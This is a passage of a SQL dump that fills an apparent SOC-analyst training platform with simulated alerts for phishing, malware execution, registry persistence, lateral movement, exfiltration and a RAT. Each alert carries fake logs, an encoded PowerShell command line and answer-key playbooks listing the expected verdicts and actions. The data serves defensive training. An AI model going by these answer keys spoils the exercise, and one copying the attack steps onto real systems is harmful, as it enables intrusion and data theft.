detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"files_transferred\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},{\\\"filename\\\":\\\"financial_data.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}],\\\"user\\\":\\\"jdoe\\\",\\\"encryption\\\":\\\"TLSv1.2\\\",\\\"status\\\":\\\"Success\\\",\\\"alert\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"files_transferred\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},{\\\"filename\\\":\\\"financial_data.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}],\\\"user\\\":\\\"jdoe\\\",\\\"encryption\\\":\\\"TLSv1.2\\\",\\\"status\\\":\\\"Success\\\",\\\"alert\\\":\\\"Data Exfiltration 
Detected\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"files_transferred\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},{\\\"filename\\\":\\\"financial_data.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}],\\\"user\\\":\\\"jdoe\\\",\\\"encryption\\\":\\\"TLSv1.2\\\",\\\"status\\\":\\\"Success\\\",\\\"alert\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"files_transferred\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},{\\\"filename\\\":\\\"financial_data.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}],\\\"user\\\":\\\"jdoe\\\",\\\"encryption\\\":\\\"TLSv1.2\\\",\\\"status\\\":\\\"Success\\\",\\\"alert\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"files_transferred\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},{\\\"filename\\\":\\\"financial_data.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}],\\\"user\\\":\\\"jdoe\\\",\\\"encryption\\\":\\\"TLSv1.2\\\",\\\"status\\\":\\\"Success\\\",\\\"alert\\\":\\\"Data Exfiltration Detected\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1280, 'Initial Access: Phishing Email Detected', 'high', 'Email gateway logs', 'A phishing email was detected attempting to gain initial access by tricking activists into downloading FakeM malware. The email contained a malicious attachment designed to infect the recipient\'s system.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:00Z\",\"email_id\":\"1234567890abcdef\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"sender_email\":\"malicious.actor@evilmail.com\",\"recipient_email\":\"activist@nonprofit.org\",\"subject\":\"Urgent: Please Review the Attached Document\",\"attachment_filename\":\"Important_Info.docx\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"malware_family\":\"FakeM\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\"}', '2026-02-24 03:14:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault\",\"verdict\":\"malicious\",\"details\":\"Known phishing IP address associated with multiple campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"malicious.actor@evilmail.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Reported phishing sender email.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with FakeM malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Important_Info.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Unusual attachment for email 
context.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Phishing Email Detected\",\"date\":\"2026-02-24T04:22:04.731Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1281, 'Execution: FakeM Malware Activation', 'high', 'Endpoint detection and response (EDR) logs', 'The FakeM malware was activated on the host machine following the download of a malicious attachment. The malware initiated its payload to infiltrate the system, establishing a foothold.', 'Malware Execution', 'T1204.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:27Z\",\"event_id\":\"987654321\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.5\",\"user\":\"jdoe\",\"file_name\":\"invoice_2023.pdf.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"process_name\":\"FakeM.exe\",\"action\":\"execute\",\"status\":\"success\",\"event_description\":\"The process FakeM.exe was executed by user jdoe on host 192.168.1.5.\",\"os_version\":\"Windows 10\",\"edr_alert_id\":\"edr-123456\"}', '2026-02-24 03:14:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for FakeM malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local host where FakeM malware was executed.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice_2023.pdf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Suspicious file masquerading as a PDF document.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the FakeM malware sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1282, 'Persistence: Registry Modification Detected', 'medium', 'Registry change monitoring tool', 'To maintain a persistent presence, the malware alters the system registry, ensuring it remains active even after system restarts. A registry modification was detected that suggests a persistence mechanism is being employed.', 'Persistence Mechanism', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.100\",\"user\":\"jdoe\",\"registry_key\":\"HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"modified_value\":\"MaliciousApp\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\MaliciousApp.exe\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"action\":\"Registry Key Modified\",\"tool\":\"RegMonitor v2.3\"}', '2026-02-24 03:14:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelService\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"ActiveDirectory\",\"verdict\":\"clean\",\"details\":\"Valid user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"MaliciousApp.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"FileAnalysisService\",\"verdict\":\"malicious\",\"details\":\"File involved in persistence mechanism.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"MaliciousApp\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\MaliciousApp.exe\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"Registry Key Modified\\\",\\\"tool\\\":\\\"RegMonitor v2.3\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"MaliciousApp\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\MaliciousApp.exe\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"Registry Key Modified\\\",\\\"tool\\\":\\\"RegMonitor v2.3\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"MaliciousApp\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\MaliciousApp.exe\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"Registry Key Modified\\\",\\\"tool\\\":\\\"RegMonitor v2.3\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"MaliciousApp\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\MaliciousApp.exe\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"Registry Key Modified\\\",\\\"tool\\\":\\\"RegMonitor v2.3\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"MaliciousApp\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\MaliciousApp.exe\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"Registry Key Modified\\\",\\\"tool\\\":\\\"RegMonitor v2.3\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1283, 'Lateral Movement: Unauthorized Network Access', 'high', 'Network traffic analysis', 'The network traffic analysis detected unauthorized access attempts from an internal workstation to multiple devices within the activist network. The source IP of the attack is identified as 192.168.1.45, with traffic directed towards 10.0.0.22. The attacker appears to be leveraging credentials for user \'jdoe\' and executing suspicious binaries identified as \'explore.exe\', which is linked to known lateral movement tactics.', 'Network Intrusion', 'T1080: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:23Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.0.0.22\",\"user\":\"jdoe\",\"executed_file\":\"explore.exe\",\"file_hash\":\"3b3f2e8f7c1d2f3f4a5b6c7d8e9f0a1b\",\"network_protocol\":\"SMB\",\"action\":\"access_attempt\",\"outcome\":\"success\",\"description\":\"Suspicious lateral movement attempt detected from compromised workstation.\"}', '2026-02-24 03:14:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP of a compromised workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Target internal device.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_db\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"explore.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Known tool used for lateral 
movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3b3f2e8f7c1d2f3f4a5b6c7d8e9f0a1b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a malicious file used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1284, 'Exfiltration: Data Transfer to External Server', 'high', 'Firewall and SIEM alerts', 'The final stage of the operation involves the exfiltration of critical information, stealthily transferring data to external servers under the attackers\' control. An observed data transfer was detected from an internal host to a suspicious external IP address.', 'Data Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:48:05Z\",\"source_ip\":\"10.25.34.5\",\"destination_ip\":\"203.0.113.45\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"TCP\",\"action\":\"ALLOW\",\"file_name\":\"exported_data_20231012.zip\",\"file_hash\":\"a6f5d3f1c76e5b9b0d2f3e5c4d8a9b2c\",\"username\":\"jdoe\",\"event_id\":\"FW123456\",\"alert\":\"Data exfiltration detected from 10.25.34.5 to 203.0.113.45\"}', '2026-02-24 03:14:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.25.34.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"exported_data_20231012.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual data export activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a6f5d3f1c76e5b9b0d2f3e5c4d8a9b2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"No known malware but unusual hash activity\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Valid 
user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1285, 'Spear Phishing Campaign Detected', 'high', 'Email Gateway Logs', 'Groundbait initiated their campaign with targeted spear-phishing emails sent to activists, embedding malicious attachments designed to breach personal accounts. The email was identified with a suspicious attachment and a known malicious IP address.', 'Phishing', 'T1566.002', 1, 'investigating', 209, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"email_id\":\"b3f2e0c9-4dff-4f2b-8451-2d54e3f9e1d4\",\"sender\":\"noreply@compromised.org\",\"recipient\":\"activist123@example.com\",\"subject\":\"Urgent Action Required\",\"attachment\":\"invoice_2023.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"malicious_indicator\":true}', '2026-02-24 03:14:42', '2026-02-27 04:05:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@compromised.org\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Email domain associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"invoice_2023.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Intel\",\"verdict\":\"malicious\",\"details\":\"File contains macro malware targeting account credentials.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to phishing infrastructure.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Campaign Detected\",\"date\":\"2026-02-24T04:22:04.745Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1286, 'Remote Access Trojan Execution', 'high', 'Endpoint Detection and Response (EDR) Logs', 'A Remote Access Trojan (RAT) has been executed on the compromised system following a phishing attack. This RAT, identified as \'Groundbait\', is used by the attacker to maintain access and initiate data gathering activities.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:25:43Z\",\"event_type\":\"process_creation\",\"host_ip\":\"192.168.1.10\",\"process_name\":\"svchost.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"parent_process\":\"explorer.exe\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"user\":\"john.doe\",\"attacker_ip\":\"203.0.113.45\",\"filename\":\"groundbait_loader.dll\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-02-24 03:14:42', '2026-02-26 07:44:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Low detection rate but known to be used in RAT delivery.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Identified as Groundbait RAT loader.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"groundbait_loader.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Loader component of Groundbait 
